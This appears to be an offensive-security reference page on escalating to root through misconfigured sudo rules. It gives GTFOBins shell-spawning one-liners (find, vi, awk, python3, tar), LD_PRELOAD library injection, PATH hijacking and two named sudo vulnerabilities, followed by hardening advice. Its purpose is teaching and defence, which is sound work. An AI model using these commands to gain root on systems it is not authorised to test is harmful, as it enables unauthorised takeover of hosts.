Skip to content

Sudo Abuse

sudo lets users run commands as another user (usually root) per rules in /etc/sudoers. It’s the legitimate way to delegate privileges, but an over-permissive configuration —a command that can be redirected to a shell, dangerous wildcards, or excessive NOPASSWD— turns sudo into the fastest and most reliable road to root. That’s why sudo -l is always the first thing checked in an escalation.

sudo -l # what commands I can run as root (and whether they need a password)

Typical outputs and what they mean:

(root) NOPASSWD: /usr/bin/find # I can run find as root WITHOUT a password
(ALL : ALL) ALL # I can do anything = direct root (sudo su)
(root) /usr/bin/vi /etc/x # vi as root -> shell from vi

If you can run as root a binary listed in GTFOBins under its sudo section, you have root:

sudo find . -exec /bin/sh \; -quit # find
sudo vi -c ':!/bin/sh' # vi/vim
sudo less /etc/profile -> !/bin/sh # less (from the pager)
sudo awk 'BEGIN {system("/bin/sh")}' # awk
sudo python3 -c 'import os;os.system("/bin/sh")'
sudo env /bin/sh # env
sudo tar cf /dev/null x --checkpoint=1 --checkpoint-action=exec=/bin/sh

GTFOBins has the recipe for dozens of binaries. If sudo -l shows one, look it up there.

If sudoers preserves dangerous environment variables (env_keep += LD_PRELOAD):

# compile a library that spawns a shell in its constructor and preload it
gcc -shared -fPIC -o /tmp/x.so exploit.c
sudo LD_PRELOAD=/tmp/x.so <allowed_command> # -> root
# sudo with a wildcard: sudo /script/* -> you can inject arguments/files
# sudo over a script writable by you -> edit the script
# sudo over a binary that calls another without an absolute path -> PATH hijacking

If secure_path isn’t right and the command uses binaries by name, PATH hijacking is possible.

Baron Samedit (CVE-2021-3156) heap overflow in sudo -> root needing no special rules
CVE-2019-14287 sudo -u#-1 -> run as root despite "ALL, !root"
# check the version: sudo --version

Baron Samedit affected almost all versions for years: if the host is unpatched, it’s direct root regardless of sudoers.

  • Least privilege in sudoers: specific commands with absolute paths, never GTFOBins binaries, no dangerous wildcards.
  • Avoid NOPASSWD except where essential; don’t preserve LD_PRELOAD/LD_LIBRARY_PATH (env_reset, not env_keep).
  • Don’t grant sudo over writable scripts or binaries that invoke other commands.
  • Patch sudo (Baron Samedit, CVE-2019-14287); correct secure_path.
  • Logging/auditing of sudo; use sudoedit instead of granting full editors.
  • sudo -l → which commands and whether NOPASSWD
  • Cross-reference each allowed command with GTFOBins (sudo section)
  • LD_PRELOAD/LD_LIBRARY_PATH if env_keep preserves them
  • Wildcards, writable scripts, PATH hijacking
  • Sudo version → Baron Samedit (CVE-2021-3156), CVE-2019-14287
  • Relative execution / misconfigured secure_path
  • Get a root shell and confirm (id)
  • Blue: minimal sudoers, patched, env_reset?